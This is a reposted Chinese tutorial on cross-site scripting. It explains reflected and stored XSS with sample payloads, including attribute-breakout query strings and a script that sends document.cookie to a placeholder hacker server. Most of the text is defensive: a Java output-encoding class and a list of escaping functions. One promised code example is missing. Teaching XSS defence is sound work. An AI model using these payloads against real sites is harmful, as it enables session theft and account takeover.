xss攻擊原理與解決方法
轉自: http://blog.csdn.net/qq_21956483/article/details/54377947
概述
XSS攻擊是Web攻擊中最常見的攻擊方法之一,它是通過對網頁注入可執行程式碼且成功地被瀏覽器
執行,達到攻擊的目的,形成了一次有效XSS攻擊,一旦攻擊成功,它可以獲取使用者的聯絡人列
表,然後向聯絡人傳送虛假詐騙資訊,可以刪除使用者的日誌等等,有時候還和其他攻擊方式同時實
施比如SQL隱碼攻擊伺服器和資料庫、Click劫持、相對連結劫持等實施釣魚,它帶來的危害是巨
大的,是web安全的頭號大敵。
- 1
- 2
- 3
- 4
- 5
攻擊的條件
實施XSS攻擊需要具備兩個條件:
一、需要向web頁面注入惡意程式碼;
二、這些惡意程式碼能夠被瀏覽器成功的執行。
看一下下面這個例子:
<div id="el" style="background:url('javascript:eval(document.getElementById("el").getAttribute("code")) ')"
code="var a = document.createElement('a');
a.innerHTML= '執行了惡意程式碼';document.body.appendChild(a);
//這這裡執行程式碼
"></div>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
這段程式碼在舊版的IE8和IE8以下的版本都是可以被執行的,火狐也能執行程式碼,但火狐對其禁止訪問DOM物件,所以在火狐下執行將會看到控制裡丟擲異常:document is not defined (document是沒有定義的)
再來看一下面這段程式碼:
<div>
<img src="/images/handler.ashx?id=<%= Request.QueryString["id"] %>" />
</div>
- 1
- 2
- 3
- 4
- 5
相信很多程式設計師都覺得這個程式碼很正常,其實這個程式碼就存在一個反射型的XSS攻擊,假如輸入下面的地址:
http://www.xxx.com/?id=" /><script>alert(/xss/)</script><br x="
最終反射出來的HTML程式碼:
<div>
<img src="/images/handler.ashx?id=" /><script>alert(/xss/)</script><br x="" />
</div>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
也許您會覺得把ValidateRequest設定為true或者保持預設值就能高枕無憂了,其實這種情況還可以輸入下面的地址達到相同的攻擊效果:
http://www.xxx.com/?id=xx" onerror="this.onload()" onload="alert(/xss/)" x="
- 1
根據XSS攻擊的效果可以分為幾種型別
第一、XSS反射型攻擊,惡意程式碼並沒有儲存在目標網站,通過引誘使用者點選一個連結到目標網站的惡意連結來實施攻擊的。
第二、XSS儲存型攻擊,惡意程式碼被儲存到目標網站的伺服器中,這種攻擊具有較強的穩定性和永續性,比較常見場景是在部落格,論壇等社交網站上,但OA系統,和CRM系統上也能看到它身影,比如:某CRM系統的客戶投訴功能上存在XSS儲存型漏洞,黑客提交了惡意攻擊程式碼,當系統管理員檢視投訴資訊時惡意程式碼執行,竊取了客戶的資料,然而管理員毫不知情,這就是典型的XSS儲存型攻擊。
XSS攻擊能做些什麼
1.竊取cookies,讀取目標網站的cookie傳送到黑客的伺服器上,如下面的程式碼:
var i=document.createElement("img");
document.body.appendChild(i);
i.src = "http://www.hackerserver.com/?c=" + document.cookie;
- 1
- 2
- 3
- 4
2.讀取使用者未公開的資料,如果:郵件列表或者內容、系統的客戶資料,聯絡人列表等等,如程式碼:
解決方法
一種方法是在表單提交或者url引數傳遞前,對需要的引數進行過濾,請看如下XSS過濾工具類程式碼
import java.net.URLEncoder;
/**
* 過濾非法字元工具類
*
*/
public class EncodeFilter {
//過濾大部分html字元
public static String encode(String input) {
if (input == null) {
return input;
}
StringBuilder sb = new StringBuilder(input.length());
for (int i = 0, c = input.length(); i < c; i++) {
char ch = input.charAt(i);
switch (ch) {
case '&': sb.append("&");
break;
case '<': sb.append("<");
break;
case '>': sb.append(">");
break;
case '"': sb.append(""");
break;
case '\'': sb.append("'");
break;
case '/': sb.append("/");
break;
default: sb.append(ch);
}
}
return sb.toString();
}
//js端過濾
public static String encodeForJS(String input) {
if (input == null) {
return input;
}
StringBuilder sb = new StringBuilder(input.length());
for (int i = 0, c = input.length(); i < c; i++) {
char ch = input.charAt(i);
// do not encode alphanumeric characters and ',' '.' '_'
if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||
ch >= '0' && ch <= '9' ||
ch == ',' || ch == '.' || ch == '_') {
sb.append(ch);
} else {
String temp = Integer.toHexString(ch);
// encode up to 256 with \\xHH
if (ch < 256) {
sb.append('\\').append('x');
if (temp.length() == 1) {
sb.append('0');
}
sb.append(temp.toLowerCase());
// otherwise encode with \\uHHHH
} else {
sb.append('\\').append('u');
for (int j = 0, d = 4 - temp.length(); j < d; j ++) {
sb.append('0');
}
sb.append(temp.toUpperCase());
}
}
}
return sb.toString();
}
/**
* css非法字元過濾
* http://www.w3.org/TR/CSS21/syndata.html#escaped-characters
*/
public static String encodeForCSS(String input) {
if (input == null) {
return input;
}
StringBuilder sb = new StringBuilder(input.length());
for (int i = 0, c = input.length(); i < c; i++) {
char ch = input.charAt(i);
// check for alphanumeric characters
if (ch >= 'a' && ch <= 'z' || ch >= 'A' && ch <= 'Z' ||
ch >= '0' && ch <= '9') {
sb.append(ch);
} else {
// return the hex and end in whitespace to terminate
sb.append('\\').append(Integer.toHexString(ch)).append(' ');
}
}
return sb.toString();
}
/**
* URL引數編碼
* http://en.wikipedia.org/wiki/Percent-encoding
*/
public static String encodeURIComponent(String input) {
return encodeURIComponent(input, "utf-8");
}
public static String encodeURIComponent(String input, String encoding) {
if (input == null) {
return input;
}
String result;
try {
result = URLEncoder.encode(input, encoding);
} catch (Exception e) {
result = "";
}
return result;
}
public static boolean isValidURL(String input) {
if (input == null || input.length() < 8) {
return false;
}
char ch0 = input.charAt(0);
if (ch0 == 'h') {
if (input.charAt(1) == 't' &&
input.charAt(2) == 't' &&
input.charAt(3) == 'p') {
char ch4 = input.charAt(4);
if (ch4 == ':') {
if (input.charAt(5) == '/' &&
input.charAt(6) == '/') {
return isValidURLChar(input, 7);
} else {
return false;
}
} else if (ch4 == 's') {
if (input.charAt(5) == ':' &&
input.charAt(6) == '/' &&
input.charAt(7) == '/') {
return isValidURLChar(input, 8);
} else {
return false;
}
} else {
return false;
}
} else {
return false;
}
} else if (ch0 == 'f') {
if( input.charAt(1) == 't' &&
input.charAt(2) == 'p' &&
input.charAt(3) == ':' &&
input.charAt(4) == '/' &&
input.charAt(5) == '/') {
return isValidURLChar(input, 6);
} else {
return false;
}
}
return false;
}
static boolean isValidURLChar(String url, int start) {
for (int i = start, c = url.length(); i < c; i ++) {
char ch = url.charAt(i);
if (ch == '"' || ch == '\'') {
return false;
}
}
return true;
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
- 121
- 122
- 123
- 124
- 125
- 126
- 127
- 128
- 129
- 130
- 131
- 132
- 133
- 134
- 135
- 136
- 137
- 138
- 139
- 140
- 141
- 142
- 143
- 144
- 145
- 146
- 147
- 148
- 149
- 150
- 151
- 152
- 153
- 154
- 155
- 156
- 157
- 158
- 159
- 160
- 161
- 162
- 163
- 164
- 165
- 166
- 167
- 168
- 169
- 170
- 171
- 172
- 173
- 174
- 175
- 176
- 177
- 178
- 179
- 180
- 181
- 182
- 183
二、 過濾使用者輸入的 檢查使用者輸入的內容中是否有非法內容。如<>(尖括號)、”(引號)、 ‘(單引號)、%(百分比符號)、;(分號)、()(括號)、&(& 符號)、+(加號)等。、嚴格控制輸出
可以利用下面這些函式對出現xss漏洞的引數進行過濾
1、htmlspecialchars() 函式,用於轉義處理在頁面上顯示的文字。
2、htmlentities() 函式,用於轉義處理在頁面上顯示的文字。
3、strip_tags() 函式,過濾掉輸入、輸出裡面的惡意標籤。
4、header() 函式,使用header("Content-type:application/json"); 用於控制 json 資料的頭部,不用於瀏覽。
5、urlencode() 函式,用於輸出處理字元型引數帶入頁面連結中。
6、intval() 函式用於處理數值型引數輸出頁面中。
7、自定義函式,在大多情況下,要使用一些常用的 html 標籤,以美化頁面顯示,如留言、小紙條。那麼在這樣的情況下,要採用白名單的方法使用合法的標籤顯示,過濾掉非法的字元。
各語言示例:
PHP的htmlentities()或是htmlspecialchars()。
Python的cgi.escape()。
ASP的Server.HTMLEncode()。
ASP.NET的Server.HtmlEncode()或功能更強的Microsoft Anti-Cross Site Scripting Library
Java的xssprotect(Open Source Library)。
Node.js的node-validator。
相關文章
- 什麼是XSS攻擊?其攻擊原理有哪些?
- XSS與SQL隱碼攻擊SQL
- web安全之XSS攻擊原理及防範Web
- 如何防止XSS攻擊
- cc攻擊防禦解決方法
- 什麼是XSS攻擊?XSS攻擊有哪幾種型別?型別
- 前端面試查漏補缺--(七) XSS攻擊與CSRF攻擊前端面試
- XSS 與 CSRF 攻擊——有什麼區別?
- 詳解Xss 及SpringBoot 防範Xss攻擊(附全部程式碼)Spring Boot
- 【技術乾貨】XSS攻擊、CSRF攻擊基本概念及防範方法
- 前端攻擊 XSS 深入解析前端
- XSS攻擊有什麼特點?XSS攻擊分為幾個型別?型別
- 總結 XSS 與 CSRF 兩種跨站攻擊
- 建議收藏!XSS與CSRF攻擊防範措施
- XSS攻擊和CSRF攻擊有什麼區別?
- 常見Flash XSS攻擊方式
- SQL隱碼攻擊問題以及解決方法SQL
- React 防注入攻擊 XSS攻擊 (放心大膽的用吧)React
- Web 安全漏洞之 XSS 攻擊Web
- 常見網路攻擊:XSS 篇
- 寬位元組XSS跨站攻擊
- 【web安全】深入淺出XSS攻擊Web
- XSS跨站指令碼攻擊介紹指令碼
- JeecgBoot抵禦XSS攻擊實現方案boot
- CSRF 攻擊 及其 Laravel 解決Laravel
- 讓你徹底瞭解SQL隱碼攻擊、XSS和CSRFSQL
- 中間人攻擊原理與實踐
- CC攻擊的原理是什麼?防禦CC攻擊的方法有哪些?
- 前端安全系列(一):如何防止XSS攻擊?前端
- Web安全之跨站指令碼攻擊(XSS)Web指令碼
- Spring中防止跨站指令碼 (XSS)攻擊Spring指令碼
- 前端安全 — 淺談JavaScript攔截XSS攻擊前端JavaScript
- 這一次,徹底理解XSS攻擊
- 聊兩句XSS(跨站指令碼攻擊)指令碼
- XXE攻擊攻擊原理是什麼?如何防禦XXE攻擊?
- 詳解Web應用安全系列(2)注入漏洞之XSS攻擊Web
- SYN洪水攻擊原理
- 攻擊面管理預防網路攻擊原理?
- 香港雲伺服器網站被攻擊的解決方法伺服器網站